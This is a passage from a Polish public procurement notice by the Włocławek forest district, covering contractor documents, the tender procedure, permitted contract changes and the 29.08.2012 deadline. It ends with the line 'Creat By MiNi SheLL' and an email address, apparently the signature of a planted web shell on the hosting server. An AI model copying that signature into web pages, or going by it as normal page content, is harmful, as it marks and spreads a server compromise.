<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. oświadczenie w trybie art. 44 ustawy o spełnieniu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy - wzór stanowi zał nr 5 do SIWZ.
2.Jeżeli w miejscu zamieszkania osoby lub w w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt III.4.3.1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z zachowaniem terminów wymienionych w pkt III.4.3.1 odpowiednio</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie postanowienia zawiera wzór umowy stanowiący (załącznik nr 7) do SIWZ.
Umowa zostanie zawarta na podstawie złożonej oferty wykonawcy,
Zmiana istotnych postanowień umowy wynikających z treści oferty jest możliwa tylko na podstawie przesłanek wymienionych w art. 144 ust. 1 pzp według poniższych warunków , niemożliwych do przewidzenia na etapie zawierania umowy przez Zamawiającego:  
 
1)	zmiana terminu realizacji przedmiotu umowy spowodowana w szczególności:	
a)	niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów itp.;
b)	koniecznością wykonania robót, których wykonanie w sposób obiektywny uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
c)	wstrzymaniem prac przez właściwe organy z przyczyn niezależnych od Wykonawcy;
d)	innymi przyczynami zewnętrznymi niezależnymi od Wykonawcy i Zamawiającego skutkujące niemożliwością prowadzenia prac.
2)	zmiana osób, podmiotów realizujących przedmiot umowy, wskazanych w ofercie Wykonawcy, 
może być dokonana w sytuacji:
a)	na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;
b)	na wniosek Wykonawcy w przypadku:
	śmierci, choroby lub innego zdarzenia losowego,
	nienależytego wykonywania powierzonych prac,
	innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).
Uwaga: w przypadku zmiany osób, Wykonawca musi przedstawić kandydaturę innej osoby spełniającej warunki zawarte w SIWZ i uzyskać zgodę Zamawiającego.
3)	zmiana osoby pełniącej nadzór z ramienia Zamawiającego, może być dokonana 
w przypadku:
	śmierci, choroby lub innego zdarzenia losowego,
	nienależytego wykonywania powierzonych prac,
	innych obiektywnych okoliczności niezależnych od Zamawiającego (np. rezygnacji).
4)	zmiana zakresu robót będzie możliwa w sytuacji:
a)	konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy i uzyskania założonego efektu użytkowego;
b)	konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
c)	odmienne od przyjętych rozwiązań w dokumentacji projektowej z uwagi na warunki terenowe, 
w szczególności istnienie podziemnych urządzeń, instalacji itp.;
d)	gdy wykonanie danych robót będzie zbędne lub konieczne do prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami, wykonania przedmiotu umowy.
 
5. Zmiana zakresu robót wymaga uzyskania akceptacji osób sprawujących nadzór autorski i inwestorski, a także zatwierdzenia do realizacji przez Zamawiającego. Zmiany, 
o których mowa w pkt 4 a-d , może spowodować  zmiany ceny wykonania przedmiotu umowy.  Zmiana ceny   wynikająca z okoliczości wymienionych w pkt 4a-d nie może skutkować przekroczeniem wartości wynagrodzenia określonego na podstawie złożonej oferty.
6. W przypadku zaniechania części robót stanowiących przedmiot umowy z uwagi na wykonanie robót zamiennych, wynagrodzenie wykonawcy zostanie odpowiednio zmniejszone o wartość nie zrealizowanych lub zaniechanych robót.
7.	Wynagrodzenie za roboty zamienne ustalone będzie na podstawie kosztorysu sporządzonego przez Wykonawcę w oparciu o normatywne nakłady czasu pracy, zużycia materiałów i pracy sprzętu wg odpowiednich KNR przy zastosowaniu tych samych norm, cen, standardów i parametrów jak w przypadku robót podstawowych.
8.	Wynagrodzenie, o którym mowa w pkt. 7 nie może spowodować przekroczyczenia kwoty wynagrodzenia ustalonego na podstawie sporządzonej przez wykonacę oferty, 
9. W przypadku konieczności wykonania robót dodatkowych udzielenie zamówienia nastąpi w trybie i na zasadach określonych w art.67 ust.5 i dalszych ustawy Prawo zamówień publicznych.
10. zmiana podwykonawców może być dokonana w sytuacji:
a)	na żądanie Zamawiającego w przypadku nienależytego wykonania powierzonych prac;
b)	na wniosek Wykonawcy w przypadku:
c)          nienależytego wykonywania powierzonych prac,
d)          innych obiektywnych okoliczności niezależnych od Wykonawcy (np. rezygnacji).
11. Zamawiający może wyrazić zgodę na powierzenie wykonania części zamówienia podwykonawcom pomimo, że Wykonawca nie zadeklarował takiej woli w złożonej ofercie. Zgoda na zaangażowanie podwykonawców może nastąpić w sytuacji:
a) na wniosek Wykonawcy w przypadku obiektywnych okoliczności niezależnych od Wykonawcy, które mogą mieć wpływ nienależyte lub nieterminowe wykonanie powierzonych prac.
12. Zmiana podatku VAT będzie możliwa w przypadku gdy nastąpi zmiana obowiązujących w tym względzie przepisów prawa. Kwota netto wynagrodzenie pozostaje niezmienna  i strony ustalają , że należny podatek VAT naliczony zostanie do niezmiennej kwoty netto w fakturze zgodnie z obowiązującym prawem w dniu wystawienia faktury.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.lasy.gov.pl/pl/bip/dg/rdlp_torun/nadl_wloclawek/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Włocławek, ul. Ziębia 13, 87-800 Włocławek, pok. 10, w godz. 7:15-15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2012 godzina 09:00, miejsce: miejsce: Nadleśnictwo Włocławek, ul. Ziębia 13, 87-800 Włocławek- pok. 3 sektretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1)W postępowaniu mogą wziąć udział Wykonawcy , którzy nie podlegają wykluczeniu na podstawie art. 24 ustawy prawo zamówień publicznych , a także
spełniają warunki i wymagania określone w SIWZ oraz w art. 22 ust. 1 ustawy prawo
zamówień publicznych . 2) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia. 3) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku o którym mowa wykonawcy ustanawiają pełnomocnika do reprezentowaniu ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego oraz
załączają do oferty stosowne pełnomocnictwo. 4) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków udziału w postępowaniu dotyczący:posiadania wiedzy i doświadczenia, dysponowania osobami zdolnymi do wykonania zamówienia, dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia winien spełniać, co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie. 5)Wykonawca może złożyć tylko jedna ofertę...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com